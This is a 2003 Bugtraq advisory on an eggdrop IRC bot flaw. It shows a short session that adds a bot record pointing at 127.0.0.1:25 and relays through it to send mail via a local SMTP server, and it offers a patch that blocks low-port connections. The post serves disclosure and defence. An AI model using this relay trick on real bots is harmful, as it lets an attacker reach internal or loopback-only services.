Bugtraq mailing list archives

Eggdrop arbitrary connection vulnerability

From: Paul Starzetz <paul () starzetz de>
Date: Sun, 09 Feb 2003 20:44:50 +0100

Hi,

there is a serious security problem in the popular eggdrop IRCbot. Thehole allows a regular user with enough 'power' (at least power to addnew bot records) to use any linked instance of the bot on the botnet asan instant 'proxy'. The following session demonstrates the problem withan out-of-the-box eggdrop 1.6.10:



.+bot bighole 127.0.0.1:25
[20:23] #IhaQuer# +bot bighole 127.0.0.1:25
Added bot 'bighole' with address '127.0.0.1:25' and no password.

You'll want to add a hostmask if this bot will ever be on any channelsthat I'm on.


[20:23] #IhaQuer# match bighole
*** Matching 'bighole':
HANDLE    PASS NOTES FLAGS           LAST
bighole   no       0 b               never (nowhere   )
 ADDRESS: 127.0.0.1
    users: 25, bots: 25
--- Found 1 match.

.relay bighole
[20:23] #IhaQuer# relay bighole
Connecting to bighole @ 127.0.0.1:25 ...
(Type *BYE* on a line by itself to abort.)
Success!

NOW CONNECTED TO RELAY BOT bighole ...
(You can type *BYE* to prematurely close the connection.)
*** IhaQuer left the party line.

220 server.org ESMTP Postfix
HELO blahblah.org
250 server.org
MAIL from: blahblah.org
250 Ok
rcpt to: ihaquer () gmx de
250 Ok
data
354 End data with <CR><LF>.<CR><LF>
blah blah
.
250 Ok: queued as CFDFC2F012

Obviously an email has been sent by the local postfix bound to theloopback address 127.0.0.1! The impact may depend on the host the bot isrunning on, including tunneling into internal networks, accessingservices bound to the loopback only, bypassing TCP wrappers etc, etc.

There is no clean solution so far, for my own I decided to modify thenet.c file and add something like:


int open_telnet_raw(int sock, char *server, int sport)
.
.
.
   name.sin_family = AF_INET;
   name.sin_port = htons(port);

+    if(port < 1024 && port != 113) {

+ putlog(LOG_MISC, "*", "WARNING attempt to connect to low port%s:%d", server, port);

+        return -1;
+   }

Hope this helps, thanks to Maciek Kroenke for bringing my attention tothis bug,

/ih

Current thread:

Eggdrop arbitrary connection vulnerability Paul Starzetz (Feb 10)
- Re: Eggdrop arbitrary connection vulnerability D.C. van Moolenbroek (Feb 10)
- Re: Eggdrop arbitrary connection vulnerability Matthew S. Hallacy (Feb 11)